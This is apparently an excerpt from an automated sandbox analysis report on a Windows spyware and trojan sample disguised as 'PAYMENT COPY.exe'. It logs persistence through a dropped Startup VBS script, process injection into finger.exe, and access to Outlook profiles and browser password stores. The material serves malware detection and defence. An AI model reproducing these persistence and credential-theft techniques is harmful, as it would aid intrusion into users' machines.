                      Source: 6.2.HashSize.exe.3b29400.3.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 6.2.HashSize.exe.3b29400.3.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@12/4@19/11
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HashSize.vbsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeMutant created: NULL
                      Source: C:\Windows\SysWOW64\finger.exeFile created: C:\Users\user\AppData\Local\Temp\4ub-1K1QxnJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HashSize.vbs"
                      Source: PAYMENT COPY.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: PAYMENT COPY.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: finger.exe, 00000004.00000002.3348989479.0000000003024000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000004.00000002.3348989479.0000000003052000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000004.00000002.3348989479.000000000302F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: PAYMENT COPY.exeVirustotal: Detection: 50%
                      Source: PAYMENT COPY.exeReversingLabs: Detection: 39%
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeFile read: C:\Users\user\Desktop\PAYMENT COPY.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\PAYMENT COPY.exe "C:\Users\user\Desktop\PAYMENT COPY.exe"
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess created: C:\Users\user\Desktop\PAYMENT COPY.exe "C:\Users\user\Desktop\PAYMENT COPY.exe"
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeProcess created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe"
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HashSize.vbs"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\HashSize.exe "C:\Users\user\AppData\Roaming\HashSize.exe"
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess created: C:\Users\user\AppData\Roaming\HashSize.exe "C:\Users\user\AppData\Roaming\HashSize.exe"
                      Source: C:\Windows\SysWOW64\finger.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess created: C:\Users\user\Desktop\PAYMENT COPY.exe "C:\Users\user\Desktop\PAYMENT COPY.exe"Jump to behavior
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeProcess created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\HashSize.exe "C:\Users\user\AppData\Roaming\HashSize.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess created: C:\Users\user\AppData\Roaming\HashSize.exe "C:\Users\user\AppData\Roaming\HashSize.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: ieframe.dllJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: mlang.dllJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: winsqlite3.dllJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                      Source: PAYMENT COPY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: PAYMENT COPY.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: finger.pdb source: PAYMENT COPY.exe, 00000001.00000002.1159114036.0000000000B48000.00000004.00000020.00020000.00000000.sdmp, BMYdhGJqo1.exe, 00000003.00000002.3350106221.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: PAYMENT COPY.exe, 00000000.00000002.1054440794.0000000005D60000.00000004.08000000.00040000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003B29000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003A44000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: PAYMENT COPY.exe, 00000001.00000002.1159408870.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000004.00000003.1164033502.00000000033BC000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000004.00000002.3353245951.000000000370E000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000004.00000002.3353245951.0000000003570000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000004.00000003.1159233310.000000000320D000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: PAYMENT COPY.exe, 00000000.00000002.1054440794.0000000005D60000.00000004.08000000.00040000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003B29000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003A44000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: PAYMENT COPY.exe, PAYMENT COPY.exe, 00000001.00000002.1159408870.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, finger.exe, finger.exe, 00000004.00000003.1164033502.00000000033BC000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000004.00000002.3353245951.000000000370E000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000004.00000002.3353245951.0000000003570000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000004.00000003.1159233310.000000000320D000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: PAYMENT COPY.exe, 00000000.00000002.1054326763.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003701000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003688000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: PAYMENT COPY.exe, 00000000.00000002.1054326763.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003701000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003688000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: BMYdhGJqo1.exe, 00000003.00000000.1079377256.000000000070F000.00000002.00000001.01000000.00000007.sdmp, BMYdhGJqo1.exe, 00000008.00000000.1229141542.000000000070F000.00000002.00000001.01000000.00000007.sdmp
                      Source: Binary string: finger.pdbGCTL source: PAYMENT COPY.exe, 00000001.00000002.1159114036.0000000000B48000.00000004.00000020.00020000.00000000.sdmp, BMYdhGJqo1.exe, 00000003.00000002.3350106221.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      .NET source code contains potential unpacker
                      Source: PAYMENT COPY.exe, JoinedAuthorizer.cs.Net Code: AuthorizeSortedAuthorizer System.AppDomain.Load(byte[])
                      Source: HashSize.exe.0.dr, JoinedAuthorizer.cs.Net Code: AuthorizeSortedAuthorizer System.AppDomain.Load(byte[])
                      Source: 0.2.PAYMENT COPY.exe.5d10000.5.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 0.2.PAYMENT COPY.exe.5d10000.5.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 0.2.PAYMENT COPY.exe.5d10000.5.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 0.2.PAYMENT COPY.exe.5d10000.5.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 0.2.PAYMENT COPY.exe.5d10000.5.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Source: 0.2.PAYMENT COPY.exe.5d60000.6.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 0.2.PAYMENT COPY.exe.5d60000.6.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 0.2.PAYMENT COPY.exe.5d60000.6.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                      Source: 0.2.PAYMENT COPY.exe.3c23fd0.0.raw.unpack, JoinedAuthorizer.cs.Net Code: AuthorizeSortedAuthorizer System.AppDomain.Load(byte[])
                      Source: 6.2.HashSize.exe.3701590.0.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 6.2.HashSize.exe.3701590.0.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 6.2.HashSize.exe.3701590.0.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 6.2.HashSize.exe.3701590.0.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 6.2.HashSize.exe.3701590.0.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Source: 6.2.HashSize.exe.3b29400.3.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 6.2.HashSize.exe.3b29400.3.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 6.2.HashSize.exe.3b29400.3.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                      Yara detected Costura Assembly Loader
                      Source: Yara matchFile source: 6.2.HashSize.exe.38ec6f0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.HashSize.exe.3a449c0.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.HashSize.exe.39451d1.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PAYMENT COPY.exe.5bd0000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.HashSize.exe.39451d1.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PAYMENT COPY.exe.5bd0000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.HashSize.exe.3a449c0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1054007496.0000000005BD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.1325090938.000000000381D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.1325090938.0000000003A44000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1027702847.00000000029CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.1278877272.00000000026AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: PAYMENT COPY.exe PID: 7040, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: HashSize.exe PID: 6792, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 0_2_02770DF5 push E9000000h; ret 0_2_02770DFF
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 0_2_064E31A2 push edi; iretd 0_2_064E31A3
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 0_2_064E3DA3 push esi; ret 0_2_064E3DA4
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_004014F0 push FFFFFF89h; retn D8D9h1_2_00401A97
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_004014F0 push ebx; retn F2A0h1_2_00401B60
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0042D963 push edi; iretd 1_2_0042D96C
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00407109 push cs; iretd 1_2_0040710B
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_004149E2 push edi; retf 1_2_004149E3
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00406365 push ebx; ret 1_2_00406366
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00403370 push eax; ret 1_2_00403372
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00417E8E push ebx; iretd 1_2_00417E90
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00414F55 push 00000079h; retf 1_2_00414F57
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0040D75B push ss; ret 1_2_0040D760
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0041870B pushad ; retf 1_2_0041870C
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0041AF95 push esi; iretd 1_2_0041AF97
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FA225F pushad ; ret 1_2_00FA27F9
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FA27FA pushad ; ret 1_2_00FA27F9
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FA283D push eax; iretd 1_2_00FA2858
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD09AD push ecx; mov dword ptr [esp], ecx1_2_00FD09B6
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FA1366 push eax; iretd 1_2_00FA1369
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeCode function: 3_2_0363E2EC push cs; iretd 3_2_0363E2EE
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeCode function: 3_2_03652178 push esi; iretd 3_2_0365217A
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeCode function: 3_2_0364493E push ss; ret 3_2_03644943
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeCode function: 3_2_0364C138 push 00000079h; retf 3_2_0364C13A
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeCode function: 3_2_0364F071 push ebx; iretd 3_2_0364F073
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeCode function: 3_2_0364F8EE pushad ; retf 3_2_0364F8EF
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeCode function: 3_2_0364D8A3 push ds; iretd 3_2_0364D8A4
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeCode function: 3_2_0363D548 push ebx; ret 3_2_0363D549
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeCode function: 3_2_0364D503 push ebx; retf 3_2_0364D50C
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_0357225F pushad ; ret 4_2_035727F9
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035727FA pushad ; ret 4_2_035727F9
                      Source: 0.2.PAYMENT COPY.exe.57a0000.2.raw.unpack, F7YlVYACjwgFlLpokwm.csHigh entropy of concatenated method names: 'Hv6AYYnFiA', 'vfbAxgL5BT', 'eCAAfcKDVF', 'qkMAN0Vjhk', 'bqpAhS1Sny', 'PTKA5bNNhS', 'jq0AGAA4wZ', 'NNGA9W9hvZ', 'omSAcl6JAE', 'owfA09u4KB'
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeFile created: C:\Users\user\AppData\Roaming\HashSize.exeJump to dropped file

                      Boot Survival

